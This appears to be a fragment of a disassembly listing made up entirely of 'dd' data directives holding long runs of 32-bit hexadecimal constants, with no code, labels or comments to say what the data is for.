dd 213830DCh, 0D12B1F93h, 0BE1E8234h, 0D22C178Eh, 6142AC99h
dd 0D6594D6Eh, 48B2B67Ah, 0FC0D1086h, 68419A80h, 43AF8073h
dd 0B591C629h, 7C59B55Bh, 5F21B948h, 60C2D76h, 0BEACD4ACh
dd 30968103h, 0E5074460h, 345AF134h, 0CAB8B9ABh, 0F3EF5002h
dd 718A8E98h, 9BDE4F83h, 7D185E39h, 71655A43h, 0A5C46FEDh
dd 0AC4E7399h, 1CF9AA45h, 0DCB28397h, 7F2D5AC1h, 23DE221h
dd 28AE741Ch, 0F3C62D08h, 0D8BD9063h, 0CD40B5E2h, 15CD3191h
dd 0D204951h, 43D7CCE7h, 4033AEEEh, 0C3252CDCh, 891F9503h
dd 0F6FA7BF9h, 0C71FECE0h, 0CEC3EC45h, 19C00902h, 64A4918Ch
dd 0BD6A6D26h, 1DC4A173h, 1C17CB2Ch, 66CE5AE9h, 0D92E9360h
dd 0D8C93A51h, 6C02E98Ah, 83D9F169h, 960C32BFh, 0CB06DC17h
dd 2BBBDB0Bh, 0FB9D6F5h, 0B07BFD06h, 0B44D40F0h, 0DF057E22h
dd 0F6BBA8BBh, 0B34C318Dh, 97D63F2Eh, 0F6FA820Fh, 409800A7h
dd 0C9C0F441h, 718728E9h, 6C99FD01h, 0F774F2E8h, 0E4A9C92Bh
dd 0FF159A9Eh, 0CC395C1Ah, 0FB0B6CEDh, 0B4C98815h, 5BFEF1E8h
dd 0DDCBA9DFh, 95BB6AB8h, 0B981B32Fh, 4D39C52Eh, 0A4295B24h
dd 7421E830h, 53B6A989h, 0E9320C9Ah, 120754D5h, 52FD5F1Dh
dd 88288A6h, 0F271E292h, 6DE6B8AFh, 3D00358Dh, 0D4226C73h
dd 831452A9h, 3000F843h, 1D13C310h, 0BB415C16h, 2F163DB9h
dd 0D3AB5711h, 4DF6CBB8h, 75D86F95h, 51093882h, 25DDC1F1h
dd 8D387367h, 9CD9DB5Eh, 0CD944E1Bh, 1673ED37h, 6894EC9Ch
dd 4CA490B1h, 0C938D1FCh, 9B561918h, 0A0878712h, 140DFE13h
dd 0A13C31AAh, 0D8CC8917h, 0E48C83EFh, 0E3A8A96Fh, 2F8F4B2Ah
dd 0A0CD8910h, 0E2BA4B42h, 0D2C24B06h, 81294A74h, 786AB978h
dd 4FB09F18h, 0B5FBF0CEh, 2953E7CBh, 50887D63h, 2ADF8563h
dd 0A980F824h, 551799Dh, 0A307EF5Bh, 0D1373B9Dh, 0E7CA98D1h
dd 75C111C0h, 2B6295CBh, 0C2FF1D58h, 0EF04B5E9h, 0F4570D33h
dd 87D65505h, 67688924h, 0E8BCCB72h, 73FBC357h, 0D9F7D16Fh
dd 0E7D904A7h, 0A9128DECh, 4F1571ACh, 6560D2D9h, 6CA07D40h
dd 4A15174Ch, 8F87CF26h, 51910103h, 0E6538336h, 0D244E451h
dd 344F136h, 7CE7CACAh, 0FF84B48Ah, 17B09EB3h, 0DA467BECh
dd 0CADA54E8h, 0D12397C9h, 1722C91Ah, 25A67163h, 0BE4AF775h
dd 8244CA6Ch, 0BBDBE158h, 830BC250h, 0E1CB2377h, 0B28465A6h
dd 0A934F766h, 35CF9F50h, 9511CD08h, 732D4FE4h, 604AA309h
dd 1B590B50h, 26BAA0F1h, 57EE8ED8h, 5497C242h, 0F9E54D0Eh
dd 179B93F8h, 1F5D3A9Fh, 0F431744Eh, 0F85FEC87h, 7C4E03E6h
dd 2A3C73F4h, 0ED3A910Fh, 0E96F2EC6h, 7E7E9F28h, 4439A8C9h
dd 0AABFC240h, 0FE115B7Fh, 0DBB683F3h, 6B0DCDCDh, 0F10376Bh
dd 6E60B32Ah, 68D10A93h, 0E0BF6EA8h, 6F8B96DDh, 3AA69E4Bh
dd 8B09D667h, 0E415A7ECh, 0BBCDF1C9h, 11750BCh, 1D9F8B8h
dd 1E218D61h, 24FFA932h, 0CD7EAC68h, 91C018B8h, 3E14117Dh
dd 0DC23FBFAh, 6723A881h, 0BA762D43h, 9751836Dh, 39A129AFh
dd 0D5FB94FDh, 0E11545DDh, 66B1ACE4h, 45499626h, 0B87010h
dd 0E90CBDF5h, 95FA4390h, 46CF38E3h, 0C28B3CA6h, 1A10CEF0h
dd 4178FC06h, 1F492575h, 27BB86Eh, 0B02093CFh, 0E7EFF257h
dd 0D616D952h, 8955B806h, 0C620931Bh, 68F4AF77h, 0C02FEF89h
dd 94C343CFh, 0F86FF245h, 6CB34591h, 0AE939AFCh, 8C27735Eh
dd 3C9EB16Dh, 0F75A235Ah, 0E119649Eh, 0A7936286h, 60AD243Ch
dd 0E93DC16Fh, 5E371498h, 0B47FE175h, 0E870399Ch, 0DC982317h
dd 0B7B70C9Bh, 110FFAB2h, 0C4E9B6C2h, 647F4ADAh, 22A63250h
dd 4FDB852Ch, 405EEBCCh, 0BBBD25D1h, 0CCC9B2DAh, 0F9E8E09Ah
dd 0A6082A87h, 0F60F7448h, 9184058Dh, 0FC8D0D8Eh, 0A48A85ADh
dd 0E10EA421h, 9BC1DF58h, 565CB256h, 0E8A72EF0h, 0D98EFFE1h
dd 17728708h, 3D0661D7h, 0A6ECE07Eh, 0EE2B1834h, 0D6ABAF1Dh
dd 144151ABh, 5D2D006Bh, 2CD05B79h, 0EBD7CC36h, 9C09CA01h
dd 0CF1ADE18h, 2123F359h, 8EDB7421h, 51FDD53Dh, 373A120Ah
dd 16E302A8h, 7151B939h, 0E3ECFC2Ch, 8C35D3CBh, 0C9199C87h
dd 9118D52Ch, 4966BF66h, 21E7C66Ch, 0AB5C0F47h, 10BAC0C9h
dd 8557BBB0h, 0F4B3B379h, 1E198D7Eh, 289C2B47h, 65B4C644h
dd 154BC5Ah, 9A5CFD79h, 8E9A5DFDh, 85C2680Fh, 9DE48BEh
dd 5B436550h, 0F7ACBE90h, 0BBBD68C7h, 0A1E3167Dh, 9FC9BBE6h
dd 0E39E7A50h, 81BE4A6Fh, 2E13763Ah, 99F3BD43h, 0BDF8DB2Ah
dd 0A7892433h, 95ED540Eh, 0B1C98B88h, 0BD1534C4h, 498C87EFh
dd 0BD7986B9h, 0DF625A7Eh, 0EDB1CF73h, 0ACB6DACBh, 0E7972125h
dd 0F8CA2DD1h, 0A040C133h, 3FA22401h, 0E13DF5C2h, 1710BADDh
dd 0B29E1D4Eh, 0F0F3A6F7h, 0DF95527Eh, 2B734603h, 4287B43Bh
dd 5E7343h, 0B896C6C5h, 0FE5B155Ch, 0EFA17654h, 8DD67096h
dd 0F4932A62h, 0B55F3908h, 0C99D06D9h, 9F54232Dh, 0ABED48C1h
dd 0FDD192E8h, 0D3BA0EC4h, 465B7AB0h, 3A9A79CDh, 15D5B36Ch
dd 0D81A3A20h, 9FBC3AA5h, 0EECF33BEh, 0C8F0ECA3h, 601D0172h
dd 95FFFEFBh, 7A63837Ch, 8943F535h, 709A5D5Dh, 99464FFBh
dd 0A97E6681h, 7C416197h, 0E5D1167Eh, 0FF8D83C5h, 826743FFh
dd 30CA5A1Fh, 0F18F641Bh, 0DB7CF4F8h, 119DF903h, 78CDC336h
dd 7D1E3B22h, 7544BEF2h, 9FE62B3Fh, 45460678h, 8AA8034Dh
dd 8A2F3F61h, 8F6EB060h
dd 770043F9h, 3BBE1F59h, 4EE97BB9h, 0ED4CD9C1h, 0EEEB4855h
dd 0BF469E1Fh, 7E2BDC98h, 6B7FB9D4h, 0CB9A8DFAh, 62C4CFA9h
dd 362DA166h, 23724FE7h, 5077D2DDh, 5ECF4CB5h, 42408309h
dd 2DC335C2h, 3CAF8526h, 76585F4Ah, 0B0D20CA9h, 0B74980E8h
dd 0E8D5D0EAh, 76F71452h, 2E80C03Ah, 80CEF43Fh, 793F87E6h
dd 0CD90D38Eh, 17C0460Fh, 110AD7Dh, 2988D941h, 929BE453h
dd 63810E30h, 7267DE3Bh, 408FE687h, 7835D5C4h, 5ABDDC66h
dd 6F8A47A3h, 0B72F0D5Ch, 19CFD64Ah, 95C3F08Bh, 0FDF44EF4h
dd 90139C6Fh, 0E7BDD99Ah, 0E11F23D0h, 7299899Eh, 2CE95ADDh
dd 7E32AE1Ah, 54084B68h, 7AF4935Ah, 664EAB8Fh, 80DACBB4h
dd 3B6A7E37h, 797F1480h, 0AFAB9253h, 0A9E454B9h, 0A54D68ABh
dd 0D396BC57h, 0E0B89295h, 4BF4A02Dh, 587797EEh, 6D6A82AFh
dd 1D56C6AEh, 7A677A26h, 0ECA18026h, 0FA8BC97Fh, 0C12A937h
dd 9569A02Ah, 856A58C3h, 970F4DCFh, 5B27B01Ah, 0E486B412h
dd 7F371381h, 0DB7A3523h, 11E67179h, 8D4708F8h, 0EB139D10h
dd 7463934Fh, 43CCF4FAh, 0C0A35B6Dh, 0F47C2FEBh, 0A29ACAE3h
dd 0ADEBF37Fh, 5986300Eh, 0A321F5Dh, 29EE38CBh, 26559B54h
dd 5B1480A7h, 0ADBB0438h, 0E4A579E3h, 0D9CA248h, 8DC35401h
dd 0C72CD262h, 2E42A261h, 0F6F09539h, 412132FBh, 88E7B5F9h
dd 0BB155433h, 8DD21791h, 0E639CE68h, 0A35033E5h, 981801FFh
dd 0A61A6EBAh, 0D2B35350h, 5DBC35D3h, 85F14734h, 29B9DA4h
dd 0F4A93728h, 13FD3F0Dh, 390B37C7h, 2C632D87h, 26E6DFD6h
dd 41CE3653h, 0CEE78F9Bh, 4E0C44B7h, 2D378CA0h, 206917ADh
dd 9D73F9A3h, 0D4281B5Ch, 6E80FA53h, 0B7BD777Bh, 2B8C3E5Ah
dd 0C6CDFA92h, 6C7A30CCh, 92B164C0h, 80A8C187h, 7FFC1CCDh
dd 2B70495Ah, 0CA0B85h, 8DCB9C7Eh, 7CBDAF26h, 0AEB16694h
dd 69C32F2Dh, 0D4C37C06h, 86EDC16Ch, 66C3F9C8h, 2FF4BFCh
dd 0A420C49Ah, 7627F6B8h, 41420E4Fh, 6B28DBB4h, 0BABE2614h
dd 40FA2889h, 0EEE06085h, 0EC9E99C7h, 0E5CBD33Bh, 0FD5C4E93h
dd 0E5DED9D8h, 9D1E6CD0h, 2C505225h, 6508D9D0h, 0E14520A1h
dd 0E77726ABh, 0FF72CDFFh, 7B8FAF28h, 43C1104h, 0F7F23403h
dd 7AEF98CAh, 5274C3Dh, 0A176473Ah, 7240FD7Ah, 0ED041370h
dd 47139BCAh, 0E2023C7Fh, 8E786C94h, 2672A0D1h, 41C7BF7Eh
dd 3E309F89h, 0C3BA3704h, 0E434670Fh, 4AF1B6Ch, 6CADB0Eh
dd 6BEA1F4Dh, 0FE1026A6h, 0B634F7D3h, 0DE19F871h, 1C127FB3h
dd 0BA91978Dh, 168E4D77h, 46DC2509h, 2DD88767h, 0EACEC632h
dd 7168DA9Bh, 7C941F38h, 46130B14h, 4B609BD7h, 1E2FF607h
dd 8FA0C9E6h, 47294F17h, 0CB3FFE42h, 0FFD0FC48h, 0EA4D4242h
dd 0FBD079CFh, 81318D77h, 255ACC71h, 855691Bh, 5BC6BA15h
dd 0DDB5CF21h, 97E05740h, 9D9BFDCDh, 0F314283Ch, 0E433E7ECh
dd 187FF3A4h, 0B5C3FFDh, 2340797Dh, 0AC5D9E3h, 779D20E7h
dd 0EE74108Fh, 0ABE29B8Dh, 9F80AB5Dh, 98B587E5h, 0DD7CEEB6h
dd 8F5F5C31h, 39C82BECh, 4280227Ch, 639B3DBEh, 74E642A7h
dd 107B9277h, 3D4BF0ABh, 21D604A7h, 360B97C9h, 2ED5D73Ah
dd 862A3A54h, 0E4D3717Bh, 0A1E5F581h, 0EAF20B6Ah, 4ECDA550h
dd 0D4FBA999h, 8D865736h, 0FBB1529Ch, 4CB60A67h, 621D3BC0h
dd 49AD973Bh, 2F4164BFh, 0FC6CC279h, 0EE899684h, 6A3DC8D9h
dd 60041D3Ah, 4769B62Bh, 2EB3A1EFh, 0C117332Fh, 7B94BA70h
dd 0E54EBF5Ch, 0E5D78189h, 5C86ECE6h, 7C40DEB4h, 383E1973h
dd 164B76DAh, 0D547F839h, 53291ABCh, 58D53F4Fh, 7B7CB0A5h
dd 800EFF93h, 195C2E6Fh, 46378A7Fh, 0EE68776Eh, 71537C21h
dd 309B9CA4h, 6A86EFEEh, 0B08B7723h, 9968D3F7h, 881E845Eh
dd 3278A8F9h, 5A0264A8h, 0A8844406h, 0B23FA881h, 4DE744D6h
dd 7EB327DCh, 85FA631Ch, 88942252h, 0A8570A0Dh, 0B630D916h
dd 0F11236A9h, 0C9705E1Bh, 99D18358h, 7F9C8A92h, 9A54CC7h
dd 0FE990407h, 4A6AEAF0h, 899D221Ah, 0B85D8AA9h, 0D69DF36Eh
dd 63E4F9BFh, 0A76EAE35h, 0ABA4D87Eh, 489C37B4h, 3D800D5Eh
dd 0F9C0134Eh, 88D98B49h, 0C9D37356h, 7F27AD6Bh, 755C0C87h
dd 2096595Ah, 58598D9Dh, 3DBB1A0Eh, 0FC316F77h, 0C162F156h
dd 0B2A4F2D2h, 4F8648D4h, 8234008Fh, 0F86AE71Ah, 3BAE28A6h
dd 0E2E1E280h, 328CD6D8h, 0A936E7E1h, 7CC9FC75h, 0A3DED8EEh
dd 224511Ah, 0D77C28D1h, 0EFE7EB87h, 2896A69Ch, 0C9CD428Dh
dd 53CA93h, 7A4FFDh, 6DBC8994h, 0F2803776h, 6FE602FAh
dd 2D96E716h, 0EE3D304Dh, 1163FD09h, 459DA5EFh, 896082EDh
dd 0F04175FAh, 0F03242C7h, 5653387Dh, 893319AFh, 93C60FDBh
dd 0ED617B13h, 82F9BF07h, 5782E66Fh, 2F64CED2h, 0DD3D3F9h
dd 0F749BA0Ah, 0DA2A14D9h, 48A2B5E7h, 77740D37h, 53FF8003h
dd 3E99264Fh, 7D36079Ah, 0CF7BD8EDh, 865CD6B8h, 0B8A5E393h
dd 0F8ACCD32h, 0B06BF3A9h, 28F9D35h, 0A9B91560h, 3E4759ADh
dd 56288CF6h, 894063FDh, 3EAC5740h, 0E2DEF158h, 59B9B6Eh
dd 6DB1C651h, 1585B5A0h, 0CD95939Fh, 0B1EDDA78h, 616AF239h
dd 2420138Dh, 0CC543B57h, 0ECA4725Eh, 3030C58Ah, 0AC97A3DCh
dd 54B83560h, 20FAC848h, 0C9039BE4h, 30C3F2EEh, 54616EACh
dd 92F27023h, 19645258h, 408D00F0h, 13597FE2h, 0EF174A8Dh
dd 84FD290Ch, 2397B3F7h, 0D316324Ah, 4A7E36DDh, 4564E279h
dd 169E5173h, 57FB0867h, 0CFF6E3E8h, 0D314F65Ah, 0E39ECE4Fh
dd 772825A1h, 2FC43C5Fh, 50625A06h, 0ACDD09C8h, 0E3CC0AE5h
dd 0A3063A54h, 397409BCh, 81A7564Fh, 0E936EDBAh, 881C777h
dd 2CA7D6CBh, 1BC3BAD6h, 0B721EDB4h, 1AB72823h, 7AECC7C6h
dd 0AFD44093h, 274AE08Bh, 161A6C0Fh, 0A72FD7CAh, 0FBA8C8B1h
dd 0E1CFFDE7h, 172D865Bh, 72037BE9h, 23A8801Eh, 5BE6DEF2h
dd 86556AB7h, 55FDD2B2h, 0A13259ADh, 0E20759D3h, 95ECC3E4h
dd 7B58EB87h, 7147C2E2h, 0C05D6A6Eh, 7C310E8Fh, 0E27CF6FEh
dd 1F3C975Dh, 0C28A52C2h, 0A0D12A4Fh, 4F9F689Eh, 336AA909h
dd 16EA6B44h, 0F5E60928h, 9863FCC1h, 0CA968DC9h, 8A8D65C4h
dd 98F57796h, 7CD84E77h, 75FB48C4h, 0CBCCB112h, 0DF5D25FBh
dd 0B616F46Ah, 0EEB737A4h, 0ED6E9808h, 8577F0AAh, 0D675EAADh
dd 63462CB8h, 0D88F2AE4h, 64E8F733h, 0FE9FD9C9h, 0F00BAADBh
dd 55692D33h, 10AD6363h, 0C39E7E4Dh, 5E1D2EDFh, 298A4FDDh
dd 485F0390h, 0D9034F3Eh, 2F9ED17Dh, 0DCB50E5h, 89FC6499h
dd 0CD139F00h, 0C497F15Bh, 61755BB7h, 0EF36AC69h, 0BCD3145Dh
dd 0D7667FAEh, 0B063371h, 47BD92AEh, 0E137F738h, 0E8D2E992h
dd 194A06D5h, 0D9412FD4h, 718C1FA8h, 5098FD6Bh, 0C1CA8895h
dd 0EC657AA8h, 0FE4F1456h, 0F3E2D799h, 0AB5EA465h, 926F8317h
dd 0FC20ED19h, 4B282558h, 58C524E3h, 29A963Eh, 5ECC8107h
dd 0BD229560h, 925A0470h, 24509442h, 0BE84248Bh, 25DFBE90h
dd 964B3335h, 1A48E170h, 0A83FD909h, 344B9FC7h, 0EA03BD34h
dd 8302693Bh, 0E5B5C8FEh, 551055C1h, 6951584Ah, 27789107h
dd 59310017h, 343974E1h, 0B65DF189h, 967F096Bh, 85225452h
dd 6D9A8C45h, 0E15B60B5h, 2318DAB0h, 0B2738A29h, 1DFBB5FFh
dd 90D81DF9h, 759488DDh, 0FB99C202h, 660D5277h, 3D5876E6h
dd 8FCDA756h, 5323ECCBh, 88B8D553h, 1D865C0Ah, 0B68640BEh
dd 0BB909461h, 1312713h
dd 3526CE75h, 5E77A26Ah, 6B778615h, 0CBD98DE1h, 0B2467412h
dd 7ECFC5AEh, 0DCCD5AA9h, 4AC1EB24h, 0F7BF370Bh, 0B5DAFE25h
dd 1F126601h, 0FF3EBD14h, 5EBB5494h, 8BE56EDEh, 5F268A4Ah
dd 0FD021842h, 30C99E9Eh, 0B893ED31h, 0F50C095Ah, 92192607h
dd 0B334B37h, 69E62A92h, 628D14E7h, 863BECBDh, 9C405472h
dd 0F4D47E5Fh, 434C8E41h, 2B04E404h, 99895EEEh, 0BA661F33h
dd 8B1D013Ch, 9F13B49Ch, 45004C28h, 255482F0h, 9F81CDh
dd 0B568D6F8h, 8EF741CAh, 65533FCh, 0F4C29004h, 13403836h
dd 0DB637196h, 22E95958h, 79216EBEh, 0E2B95B87h, 0D9BAE87Bh
dd 0EBCBE015h, 0BD2229BFh, 35FA5172h, 127ABFD1h, 98563588h
dd 0EEF3BF46h, 496DFD45h, 0EB2F2EEFh, 25254C7Bh, 0FFC182D9h
dd 0DC0C0EDh, 0BDF22508h, 0AD76550Bh, 0F440C1B9h, 0ECB0BA72h
dd 0B88D1F9Eh, 0D96DA2DCh, 0DE797B0Dh, 87B00009h, 52DEC12Dh
dd 0F5CAFD7Eh, 2B9FC723h, 0CA1C90AFh, 204DB345h, 0E1018BD0h
dd 0C11AD716h, 4004EEB7h, 0B547AC03h, 8FFA0732h, 97E4B5Dh
dd 5FB64F3Ch, 5C666DCCh, 0B097C5EAh, 48CCA1E7h, 5A439013h
dd 32414737h, 0D1278FFAh, 7EB86472h, 4FE13FBAh, 9B53B310h
dd 0FEE44241h, 80C08E9Dh, 0B8EA2BA7h, 88CE1575h, 1BE0D82h
dd 701C7E46h, 0CB996040h, 3F8ABB0Fh, 653217BBh, 9FDC16F5h
dd 3268EC7Dh, 478BAA07h, 0A8027B74h, 6185405Eh, 0B3E66083h
dd 0EA84FA37h, 0ECEC4E65h, 1AB0D9ABh, 5238B861h, 3EBFCFA6h
dd 389988A1h, 7AECD69Eh, 0B78C4FC2h, 0C6FE3C4Bh, 0F3F63F8Ah
dd 142D3179h, 0DB07A54h, 0B8245CC6h, 852C3491h, 0CAE8CCD6h
dd 879E680Eh, 7663A782h, 0B1C0F2D8h, 0BB17FBFAh, 97523C8Ah
dd 0A873406Fh, 0D93E0CE8h, 797CBB92h, 0C166DC4Fh, 78E89985h
dd 2AA0CD47h, 9EC53D4h, 1297B8ABh, 1BE16206h, 1BF1BF88h
dd 2E4071F9h, 76F0BB2Bh, 3C9B779Bh, 80C405E6h, 0B46D77D8h
dd 584C7EC3h, 0CC6C9BC9h, 0F0D55E1h, 80EA5D43h, 60E1DB71h
dd 0B0BB2726h, 10A66CA7h, 7991524Bh, 601D1AFFh, 56B1F100h
dd 0EDAC5DC5h, 0F0D9E983h, 45BE7B0Eh, 0CEAC7414h, 0AFB5E1FAh
dd 8D0D50CCh, 2D49E6E5h, 2BE2038Dh, 12A04ADAh, 235E8E0Eh
dd 0A8A9F85Ch, 0D8E384A1h, 0F352AFCFh, 5CE36D6h, 0AC057A35h
dd 82696281h, 0F28D93E5h, 8E106238h, 28904125h, 0D1845FF6h
dd 0F6BE11DBh, 947A07A5h, 6F3ABA53h, 0B83C5295h, 7282FC04h
dd 8ECD7E9h, 9B6D37CBh, 22C0F4B0h, 961C0D3Ah, 4E0E82C0h
dd 8058137Eh, 3C857724h, 9CB4BF61h, 459145A9h, 0EAD17179h
dd 0CA6EC7Dh, 2602EC22h, 0A3E136Fh, 0E5A1B830h, 0C7889630h
dd 0F0C223E3h, 0F904A850h, 785D1274h, 6398BE77h, 0B843539Fh
dd 0AA3A2787h, 0F639F6E1h, 35D46E8h, 0D6CE821Eh, 0D9621B10h
dd 0F0C8FAE7h, 8601B443h, 87166062h, 224684ABh, 6CFB1E2Bh
dd 0A536F3CCh, 39011C9h, 0A377A1A9h, 32B45A91h, 412A0C55h
dd 0CF4CA31h, 563E651Ah, 0CEEF083Eh, 0EFD1AB51h, 264B7AAFh
dd 4E1FDB8h, 75C462F0h, 0DF35EE18h, 0BC58E959h, 0E2250ECDh
dd 7C93AC80h, 0B8529208h, 99B77E18h, 859881Ch, 0AB6616C2h
dd 593CA4DFh, 0FF87C763h, 31C2ED7Eh, 87493B3Ah, 10BD8ED8h
dd 0C5FA5646h, 27F6F5D5h, 7CACDE0Ch, 792D7E32h, 4F222495h
dd 5655E23Dh, 57785C4Bh, 0C10B2ADEh, 94CAE3F3h, 328B973Eh
dd 38710A32h, 0BE37F312h, 0C03C8B7h, 6F40FC82h, 1CEE29A1h
dd 2CFF5283h, 7593352Bh, 6A58AA48h, 923797FBh, 472C0E8Ch
dd 127725C1h, 8BC2CCD1h, 322E48CBh, 8EBFAC58h, 577F0F76h
dd 79539D13h, 6CD3945Eh, 678D3D6Eh, 5FE2EC89h, 110F55A4h
dd 6B173BA1h, 5741B9FCh, 3C8828BCh, 0B8517972h, 0C82707E5h
dd 9FA840EFh, 0B141AEC8h, 6F4CA4DFh, 0B606B686h, 0BBEFB1F3h
dd 0E8F505EBh, 0C8C2DB26h, 3D9A7670h, 0DB9A8626h, 17BD515Eh
dd 8145551Bh, 0AB5B150Fh, 0F8352253h, 0DC05EFB0h, 83D0035Eh
dd 66C4F448h, 0DDFF6041h, 4AEDE79Ch, 0BC44A04Ch, 0A16940E8h
dd 932E12CAh, 0A542278Fh, 0CCC99E03h, 0CA39A736h, 935B0D3Fh
dd 5D78E87Fh, 0DA7B7C1Dh, 3A1A99E3h, 16AB6FA8h, 0BF015F76h
dd 8ABF4F56h, 5FE2D4D3h, 0C4BAA251h, 986E2730h, 0C10C5FF7h
dd 69EF4487h, 0AE31B483h, 0D6D2F1B3h, 1333FFB1h, 1CBB99F6h
dd 26F80EF4h, 17A0C2FDh, 0C7C6AA70h, 0BDAB9424h, 0B13B2C73h
dd 0D3BF3514h, 99FECB77h, 0FF058EB8h, 0BD6068CCh, 9761036Ch
dd 0C252B8ADh, 0F907BDDCh, 1BDE9DDDh, 95B39C96h, 322ECCB5h
dd 1923E9Eh, 1780D112h, 8F778DECh, 15EF9134h, 0EA2C7DE9h
dd 23903151h, 50B032C0h, 7A3C197Ah, 0D327F635h, 4B27DA44h
dd 0F10B3933h, 2B0EE458h, 0D5AEB6AAh, 0D30738C6h, 0DB11043Dh
dd 0A518D328h, 73E30B01h, 4723141Dh, 86DDE336h, 360A3A42h
dd 46F1D7D9h, 2E394400h, 7DD9EBC2h, 0AA8991D2h, 0C67CA8D0h
dd 0C6B74144h, 0EA81192Eh, 20CEA10Dh, 5029E756h, 0D458B2CFh
dd 2AA9AC63h, 0E80C45ABh, 570FACC3h, 63215F30h, 0E749B91Bh
dd 6365CD6Dh, 0DEE0D820h, 0BDB26E8Dh, 922D65A5h, 8222F487h
dd 9F876E28h, 76F1DD19h, 0A9E05BAEh, 98E02EB2h, 51C6EA27h
dd 0C7626C1h, 53E4114Fh, 0D120B012h, 0AC133B8Ah, 0AE014808h
dd 467478C9h, 0C8E5D973h, 4DF8CE27h, 0F1E59BC1h, 5E57B145h
dd 613BDEC4h, 0E30465C1h, 0E82FC8FAh, 0F140C2D4h, 0A57FB35Ch
dd 91C38CDFh, 106C51Bh, 0DF6F0386h, 72E6B63Dh, 690298EBh
dd 65A35CBEh, 0C6078D03h, 9EDC0C6h, 6BA6369Dh, 0F4914DDCh
dd 58B7521Ch, 0BBF6CE3Ch, 47F286DAh, 1DCA7206h, 4106F617h
dd 2780360Eh, 95C18F9Bh, 565DE41Ah, 0D539E083h, 0A3AABF43h
dd 557837DFh, 0D4DE7930h, 9273569h, 907EF22Ch, 7F8924Bh
dd 0AE42A01h, 8F30BC15h, 13E363A3h, 0C89CA503h, 69749375h
dd 3B551C1Dh, 9ABA6802h, 0DFF554B8h, 0B87FA0B0h, 0FDCDA600h
dd 2C2FF5Ch, 0B73405B0h, 0AA0529A2h, 1D2F3E47h, 72FB2C51h
dd 624A0D1Eh, 5C5CD586h, 1C94D8FDh, 9C4E2344h, 633A3E11h
dd 301A8EF1h, 4A7B3B83h, 4B6961CAh, 0FE71009Ah, 4D878C2Ah
dd 1848D2B2h, 30ACE079h, 4C37AB25h, 0EBF0C67Ch, 0ADCC1477h
dd 9E332426h, 0D12FEB8h, 9E6FC29Bh, 24A6426Ch, 0B96B6632h
dd 5983D5B4h, 0EDDAF30Fh, 0C79662BFh, 0BB416DFCh, 87665DAAh
dd 691A2C4Eh, 24587CC0h, 0DE6142BEh, 0F0F75E66h, 0D7E290B9h
dd 7977A88Ah, 1A81446h, 0E0EB8703h, 6A6CAE3Fh, 65C2A10Ch
dd 0A464A89Ah, 851BCB89h, 605018A7h, 0F82C6D98h, 753D0316h
dd 4758C4C1h, 4EAA27h, 212A9775h, 0F274F7A0h, 816B138Bh
dd 0B2338F10h, 6A3FF3CAh, 14B4D16Fh, 119FEB86h, 0CD3A2A44h
dd 1DD18E56h, 0DFE2672Bh, 0EDA49DACh, 3D60B60Ch, 0CFBB15B2h
dd 0E91A45CDh, 0DCC7F7A2h, 1C500884h, 0D0197EC6h, 7119947Eh
dd 0BB622476h, 0B2661940h, 15E97DB9h, 0E66F5C6Ah, 8EFF09BFh
dd 5CA78D26h, 0A871AC42h, 7A799573h, 95EA3530h, 44512376h
dd 0D795593Dh, 0B8D87896h, 81D09A0Ah, 6B677D56h, 8F7F3F99h
dd 0A5FDE6EDh, 5D9745DDh, 0D75F83FBh, 0B36AB903h, 43FA06F8h
dd 51551338h, 3C075FB4h, 5FD11ABCh, 5E1BC214h, 0CE7A1725h
dd 6020A339h, 88AE2157h, 951A99C0h, 8902A15Ch, 2FE3BD98h
dd 0D36E906Ah, 0A8658C46h, 79D763CBh, 827F8206h, 1C8804BEh
dd 0BE6AEC10h, 0D8BC8930h
dd 0E0865340h, 3A5CD0CAh, 9DAF42F8h, 92C53D51h, 5B155F30h
dd 1F499D21h, 3803F0B9h, 0CF58A107h, 67D8447Fh, 0D5D76151h
dd 3D943271h, 23E6858Ch, 78BE445Bh, 843E0555h, 44382761h
dd 32EDEEF0h, 0FE781030h, 0D3CF60E1h, 82E7F6Dh, 0BA72B6CAh
dd 3C45ECA5h, 715D5845h, 51F9029Dh, 95D129E9h, 0F203A2A5h
dd 0B635F6F5h, 0BE15E102h, 0B7C986FFh, 0E4C9A9A5h, 6FF7E421h
dd 70290F91h, 0EBEB550Eh, 0DA5BBF59h, 0FC0EB458h, 673552BFh
dd 6081B837h, 3A0D4F4h, 17AC005Eh, 5DD04EEDh, 0D8D5CF13h
dd 9D6B82DCh, 5B54C104h, 30B96122h, 0BBD2F3B0h, 0B1000B2h
dd 2CAD86ECh, 15E14DDDh, 0E1E70782h, 0D57E07A2h, 331A06ABh
dd 58EBA6D5h, 218BC27Dh, 0A77DEF99h, 0D6CA0CDAh, 4D53A1DBh
dd 0A3D85974h, 3E0BE511h, 0CD5BF388h, 0D0947788h, 0A320D1DAh
dd 0B6DD1DE2h, 0D329FFAEh, 0A1773C93h, 0EDC0C0EBh, 4A9BE7C3h
dd 2E3D175Eh, 91D42523h, 726837DDh, 242F7231h, 6050D09Ch
dd 9D847A58h, 54D80EE0h, 461572A3h, 0E4499DBFh, 29C98E95h
dd 0AA56B7D8h, 0A7EA9828h, 0EFBF31ACh, 8803ED93h, 0C624C068h
dd 5659EA42h, 0B7BC5488h, 9D6D5626h, 5DE7ECC0h, 0C39A6785h
dd 5FE6C5EBh, 64CA88CDh, 66080E8Bh, 24111131h, 34B64946h
dd 5B596975h, 9985FA39h, 3754C25Dh, 0FF344D46h, 0F34B5676h
dd 1C0C4881h, 0D5880AB4h, 495AFBCBh, 0F4392255h, 68864E46h
dd 0A1DBA9D5h, 0A407AD47h, 335666C9h, 0F602D8C9h, 0E64F1D4Fh
dd 8FB9E0A9h, 0D9EEBEE1h, 5D25DAB1h, 6EE8AE41h, 6BB7A54Eh
dd 217A3042h, 47F46546h, 0FEBE47FDh, 9F8C22DAh, 1EAE461Ch
dd 18BF86F7h, 0DE1AA2AEh, 0C0805567h, 6AA237D0h, 7B715h
dd 312C68A4h, 6999B7D8h, 0D6212AC9h, 73C61A81h, 0B51F441Ah
dd 0CD9EFA43h, 0B552C0A1h, 34582D34h, 1CDFB03Eh, 0DF0A7E54h
dd 5E703C17h, 797BE48Eh, 6A53AF2Dh, 0ED9B8AC5h, 952103A2h
dd 0AF8F6892h, 0A448A59Eh, 0E92E17D1h, 0BA34AB18h, 627C64BEh
dd 0D4DC659Dh, 1E13E0F5h, 0ED27ED9Dh, 0C4D1A11Dh, 0E7E1ECC6h
dd 46446419h, 1476DBBh, 0A3A5EC6Bh, 7D7D595Ah, 0F79B4DBAh
